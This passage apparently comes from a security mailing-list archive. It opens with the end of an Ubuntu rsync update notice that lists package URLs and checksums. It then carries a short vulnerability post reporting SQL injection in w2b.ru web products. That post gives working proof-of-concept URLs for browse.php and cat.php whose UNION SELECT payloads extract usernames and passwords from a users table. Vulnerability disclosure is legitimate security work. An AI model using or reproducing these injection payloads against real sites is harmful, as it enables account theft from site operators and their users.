SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-3ubuntu1.2_sparc.deb Size/MD5: 270148 d6af336d9d029920c4c9b308e50f1e45 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-5ubuntu1.1.diff.gz Size/MD5:40051 f86fdffdfeb406e1164dd8573c527174 http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-5ubuntu1.1.dsc Size/MD5: 658 6ce35afac1779ce799dd10e42535bcb7 http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9.orig.tar.gz Size/MD5: 811841 996d8d8831dbca17910094e56dcb5942 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-5ubuntu1.1_amd64.deb Size/MD5: 277264 2652f8655e5f33073a90e0d25559aada i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-5ubuntu1.1_i386.deb Size/MD5: 263124 90761cc1de553a35fb6c719e5632b84d powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-5ubuntu1.1_powerpc.deb Size/MD5: 283556 cc28973832efb6c5e2fe82893ce774d4 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/r/rsync/rsync_2.6.9-5ubuntu1.1_sparc.deb Size/MD5: 271206 4909fa7ccc14431f6419f51da2487400 signature.asc Description: Digital signature
w2b.ru multiple products SQL Injection
--- | Aria-Security Team (Persian Security Network) | | http://Aria-Security.com (For English) | | http://Aria-Security.net (For Farsi)| | Greetz: | | AurA, NULL, Kinglet, t3rr0r1st, Moromort| | and to all of our staff | | Discovered by The-0utl4w| --- Original Advisort Vendor: http://w2b.ru Affected Script: "Dating Club" PoC browse.php?mode=browsebyCat&_gender=0&age_from=15&age_to=-4214/**/union/**/select/**/1,user_name,password,4,5,6,7,8/**/from/**/users/*&country=&state=&field=body Other product have the same problems. Example phpHotResources: cat.php?lang=4&kind=-4214+union+select+1,user_name,password,4,5,6,7,8,9+from+users/* (this syntax mite not work but there's sql injection!) Original link: http://forum.aria-security.com/showthread.php?p=70 Regards, The-0utl4w
